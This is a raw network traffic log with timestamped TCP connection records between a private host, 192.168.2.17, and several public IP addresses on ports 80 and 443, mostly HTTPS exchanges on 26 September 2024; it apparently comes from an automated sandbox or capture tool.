Sep 26, 2024 17:41:09.101033926 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:09.117041111 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:10.330054045 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:12.733062029 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:14.522205114 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:41:17.538105011 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:18.702115059 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:22.372493982 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.372529984 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.372631073 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.373447895 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.373465061 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.819839001 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.819871902 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.819955111 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.820208073 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.820223093 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.866616964 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.866669893 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.866769075 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.867666960 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.867686987 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.899905920 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.899935961 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:22.900026083 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.900234938 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:22.900243998 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.026161909 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.027007103 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.027018070 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.027518034 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.028804064 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.028889894 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.029078960 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.071410894 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.331789970 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.331924915 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.331988096 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.332003117 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.332077980 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.332129955 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.332137108 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.335932970 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.336004019 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.336077929 CEST	49717	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.336093903 CEST	443	49717	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.469228029 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.469525099 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.469535112 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.469888926 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.470191956 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.470244884 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.470315933 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.515399933 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.534715891 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.535001040 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.535017014 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.536200047 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.536263943 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.536545992 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.536619902 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.536693096 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.536709070 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.536909103 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.536917925 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.538038015 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.538125992 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.538465023 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.538530111 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.538594961 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.538602114 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.583406925 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.585249901 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.585253954 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.585263968 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.633128881 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.778862000 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.778915882 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.778945923 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.778963089 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.778973103 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.779015064 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.779020071 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.780679941 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.780734062 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.780738115 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.781356096 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.781407118 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.781411886 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.787108898 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.787132025 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.787161112 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.787169933 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.787209988 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.841255903 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.843308926 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.843508005 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.844655037 CEST	49720	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.844674110 CEST	443	49720	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.845932961 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.845989943 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.846024990 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.846044064 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.846076012 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.846122980 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.846131086 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.846142054 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.846174955 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.852471113 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.855531931 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.855597019 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.855614901 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.855628014 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.855659008 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.858725071 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.865461111 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.865530968 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.865578890 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.865587950 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.869405985 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.869467020 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.869482994 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.874849081 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.874917030 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.874923944 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.881146908 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.881216049 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.881231070 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.887685061 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.887764931 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.887772083 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.893698931 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.893801928 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.893810034 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.900209904 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.900329113 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.900337934 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.906239033 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.906260967 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.906263113 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.906359911 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.906368017 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.911952019 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.912043095 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.912067890 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.917525053 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.917591095 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.917598963 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.923610926 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.923700094 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.923706055 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.931881905 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.931974888 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.932008982 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.936706066 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.936734915 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.936803102 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.936815023 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.936856985 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.940896034 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.947287083 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.947314978 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.947346926 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.947357893 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.947402000 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.953433990 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.959095955 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.959151983 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.959177017 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.959192991 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.959235907 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.959281921 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963268042 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963299990 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963305950 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963341951 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.963371992 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963371992 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.963376999 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963397980 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.963418961 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.963443995 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.963459969 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.965461969 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.965521097 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.965528965 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.966156960 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.966660976 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.966717005 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.966723919 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.974991083 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.975039959 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.975102901 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.975128889 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.975156069 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.975171089 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.975217104 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.975241899 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.978924036 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.978992939 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.979005098 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.979355097 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983042002 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983079910 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983107090 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.983122110 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983170033 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.983757019 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983812094 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983814001 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.983824968 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.983870029 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.988152981 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.989651918 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.993345022 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.993401051 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.993424892 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.993448973 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:23.993506908 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:23.998615026 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.004057884 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.004149914 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.004173040 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.004194021 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.004254103 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.004419088 CEST	49718	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.004439116 CEST	443	49718	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022551060 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022608995 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022629023 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.022646904 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022692919 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.022696972 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022710085 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.022763014 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.027182102 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027297020 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027345896 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.027359962 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027570009 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027609110 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027632952 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.027640104 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.027684927 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.031809092 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.037201881 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.037245035 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.037281990 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.037293911 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.037338018 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.037703991 CEST	49721	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.037755013 CEST	443	49721	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:24.037822962 CEST	49721	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.038357019 CEST	49721	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.038368940 CEST	443	49721	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:24.040529013 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.040543079 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:24.040640116 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.040896893 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:24.040910006 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:24.042557955 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.048049927 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.048119068 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.048130035 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.053423882 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.053478003 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.053512096 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.053525925 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.053565025 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.058212996 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.063093901 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.063144922 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.063189030 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.063201904 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.063240051 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.068917990 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.073163033 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.073215961 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.073263884 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.073273897 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.073318958 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.077848911 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.083302975 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.083353043 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.083408117 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.083425045 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.083471060 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.086848974 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.090889931 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.090954065 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.090964079 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.090975046 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.091022968 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.094929934 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.099916935 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.100001097 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.100006104 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.100022078 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.100076914 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.102773905 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.106724977 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.106774092 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.106816053 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.106831074 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.106878996 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.110510111 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.110589027 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.110640049 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.110650063 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.117410898 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.117470980 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.117481947 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.120126009 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.120193958 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.120202065 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.121830940 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.121912956 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.121922016 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.123228073 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.123302937 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.123310089 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.124754906 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.124811888 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.124819040 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.126194000 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.126270056 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.126276970 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.128281116 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.128361940 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.128369093 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.130728960 CEST	443	49719	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:24.130798101 CEST	49719	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:24.130806923 CEST	443	49719	142.250.185.132	192.168.2.17
